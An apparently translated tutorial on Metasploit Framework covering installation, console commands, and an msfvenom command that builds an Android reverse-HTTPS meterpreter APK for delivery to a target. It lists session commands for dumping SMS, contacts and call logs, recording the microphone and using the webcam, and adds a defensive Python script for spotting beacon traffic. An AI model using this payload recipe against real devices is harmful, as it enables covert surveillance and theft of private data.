This article is intended for learning and technical discussion only and is not meant to spread any capability for malicious activity; the aim is simply to help readers learn about and understand MSF.
Metasploit Framework (MSF) is the best-known software penetration-testing tool available today. It bundles thousands of tools and modules for discovering and exploiting vulnerabilities, performing reconnaissance, testing, and creating tools and payloads, and it is a love-hate affair for attackers and defenders alike.
Three editions:
Metasploit Pro
Metasploit Community
Metasploit Framework
1. Update
```
apt-get update && apt-get upgrade
```
2. Install all dependencies
```
apt install -y git ruby ruby-dev build-essential zlib1g zlib1g-dev libpq-dev libpcap-dev libsqlite3-dev
```
3. Clone the official git repository
```
git clone https://github.com/rapid7/metasploit-framework.git
```
4. Install Ruby's bundler package manager
```
gem install bundler
```
5. Enter the directory and install:
```
cd metasploit-framework && bundle install
```
6. Go
```
./msfconsole
```
The above is not every possible step or path; there are many versions, each with its own installation method, but all of them are started with msfconsole:
Metasploit Framework — msfconsole
1. Help (the fastest way to get to know a tool; this applies to any tool you are new to)
```
msf-potian > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    debug         Display information useful for debugging
    exit          Exit the console
    features      Display the list of not yet released features that can be opted in to
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    grep          Grep the output of another command
    help          Help menu
    history       Show command history
    load          Load a framework plugin
    quit          Exit the console
    repeat        Repeat a list of commands
    route         Route traffic through a session
    save          Saves the active datastores
    sessions      Dump session listings and display information about sessions
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    tips          Show a list of useful productivity tips
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers

Module Commands
===============

    Command       Description
    -------       -----------
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    clearm        Clear the module stack
    favorite      Add module(s) to the list of favorite modules
    info          Displays information about one or more modules
    listm         List the module stack
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Interact with a module by name or search term/index

Job Commands
============

    Command       Description
    -------       -----------
    handler       Start a payload handler as job
    jobs          Displays and manages jobs
    kill          Kill a job
    rename_job    Rename a job

Resource Script Commands
========================

    Command       Description
    -------       -----------
    makerc        Save commands entered since start to a file
    resource      Run the commands stored in a file

Database Backend Commands
=========================

    Command           Description
    -------           -----------
    analyze           Analyze database information about a specific address or address range
    db_connect        Connect to an existing data service
    db_disconnect     Disconnect from the current data service
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
    db_remove         Remove the saved data service entry
    db_save           Save the current data service connection as the default to reconnect on startup
    db_status         Show the current data service status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces

Credentials Backend Commands
============================

    Command       Description
    -------       -----------
    creds         List all credentials in the database

Developer Commands
==================

    Command       Description
    -------       -----------
    edit          Edit the current module or a file with the preferred editor
    irb           Open an interactive Ruby shell in the current context
    log           Display framework.log paged to the end if possible
    pry           Open the Pry debugger on the current module or Framework
    reload_lib    Reload Ruby library files from specified paths
    time          Time how long it takes to run a particular command
```
2. Quick search
```
search <anything>
search android
```
Pick the module you want to try out:
```
use <#number>
use 19
```
View the supported options and commands:
```
show options
info
info -d
```
Generate the payload, using an Android phone as the example:
```
msfvenom -p android/meterpreter/reverse_https LHOST=<Your_IP> LPORT=<Your_Port> R > evilcorp.apk
```
Now, once we have delivered the payload to the target by whatever means and it has been installed and run, we can enjoy the results with the following command:
```
exploit
```
Here we go:
Start your first hacking journey from here!
exploit finalized!
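The `reverse_https` payload generated above only "works" because the infected device calls back to LHOST:LPORT and keeps polling the handler for the life of the session; that same regularity is what a defender can hunt for in egress logs. The following Python script is an added example and is not code from the original post or from the Metasploit project: it groups outbound connection records by (source, destination, port) and flags any tuple whose inter-connection gaps are numerous and nearly uniform. The log line format, the sample records (including the addresses and port) and the thresholds are all constructed assumptions for this example and should be tuned to the environment.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample records (not real traffic): "timestamp src_ip dst_host dst_port".
# 10.0.0.5 checks in every 5 s to one host:port (beacon-like);
# 10.0.0.7 reaches a host at irregular, human-like intervals.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.5 203.0.113.10 8443
2024-05-01T10:00:05 10.0.0.5 203.0.113.10 8443
2024-05-01T10:00:10 10.0.0.5 203.0.113.10 8443
2024-05-01T10:00:15 10.0.0.5 203.0.113.10 8443
2024-05-01T10:00:20 10.0.0.5 203.0.113.10 8443
2024-05-01T10:00:25 10.0.0.5 203.0.113.10 8443
2024-05-01T10:00:02 10.0.0.7 198.51.100.20 443
2024-05-01T10:03:40 10.0.0.7 198.51.100.20 443
2024-05-01T10:04:01 10.0.0.7 198.51.100.20 443
2024-05-01T10:11:30 10.0.0.7 198.51.100.20 443
2024-05-01T10:12:05 10.0.0.7 198.51.100.20 443
"""


def parse_log(text):
    """Parse the constructed log format into (src, dst, port, datetime) tuples."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, src, dst, port = line.split()
        records.append((src, dst, int(port), datetime.fromisoformat(ts)))
    return records


def find_beacons(records, min_connections=5, max_cv=0.2):
    """
    Group records by (src, dst, port) and return the tuples whose gaps between
    consecutive connections are regular: the coefficient of variation
    (population stdev / mean) of the gaps is at or below max_cv.
    Polling check-ins from an HTTP(S) transport look like this; interactive
    browsing does not. Thresholds are assumptions, not Metasploit constants.
    """
    groups = defaultdict(list)
    for src, dst, port, ts in records:
        groups[(src, dst, port)].append(ts)

    findings = []
    for (src, dst, port), stamps in groups.items():
        if len(stamps) < min_connections:
            continue  # too few samples to judge regularity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # all connections at the same instant; not a polling pattern
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            findings.append({
                "src": src, "dst": dst, "port": port,
                "connections": len(stamps),
                "mean_gap_s": avg, "cv": round(cv, 3),
            })
    return findings


if __name__ == "__main__":
    for f in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"possible beacon: {f['src']} -> {f['dst']}:{f['port']} "
              f"every ~{f['mean_gap_s']:.0f}s over {f['connections']} connections "
              f"(cv={f['cv']})")
```

On the constructed input only the 10.0.0.5 tuple is reported (six connections, 5 s apart, cv 0.0); the 10.0.0.7 tuple has gaps ranging from 21 s to 449 s and is left alone. Real transports can add jitter, so `max_cv` is the knob to loosen when tuning against genuine egress data.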
The list of commands available inside the session:
```
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcat          Read the contents of a local file to the screen
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command       Description
    -------       -----------
    screenshare   Watch the remote user desktop in real time
    screenshot    Grab a screenshot of the interactive desktop

Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam

Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system

Android Commands
================

    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    hide_app_icon     Hide the app icon from the launcher
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wakelock          Enable/Disable Wakelock
    wlan_geolocate    Get current lat-long using WLAN information

Application Controller Commands
===============================

    Command         Description
    -------         -----------
    app_install     Request to install apk file
    app_list        List installed apps in the device
    app_run         Start Main Activty for package name
    app_uninstall   Request to uninstall application
```